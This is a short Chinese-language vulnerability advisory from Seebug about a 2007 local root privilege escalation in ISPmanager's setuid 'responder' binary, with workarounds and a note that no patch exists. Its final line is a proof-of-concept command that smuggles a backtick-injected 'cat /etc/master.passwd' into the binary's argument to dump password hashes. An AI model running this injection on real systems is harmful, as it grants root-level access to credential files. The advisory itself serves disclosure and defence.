ISPmanager Responder本地权限提升漏洞

2007-11-22T00:00:00
ID SSV:2487
Type seebug
Reporter Root
Modified 2007-11-22T00:00:00

Description

BUGTRAQ ID: 26503

ISPmanager是托管服务供应商广泛使用的控制面板解决方案。

ISP Manager的usr/local/ispmgr/sbin/responder setuid二进制程序中在处理参数时存在输入验证错误,可能允许本地用户以root用户权限执行任意命令。

ISPsystem ISPmanager 4.2.15.1 临时解决方法:

chmod u-s /usr/local/ispmgr/sbin/respondern

或者

rm /usr/local/ispmgr/sbin/responder

厂商补丁:

ISPsystem

目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

<a href=http://ispsystem.com/ target=_blank>http://ispsystem.com/</a>

                                        
                                            
                                                /usr/local/ispmgr/sbin/responder&nbsp;/tmp/&nbsp;'`&nbsp;cat&nbsp;/etc/master.passwd1&gt;&amp;2&nbsp;`'&nbsp;2&gt;&amp;1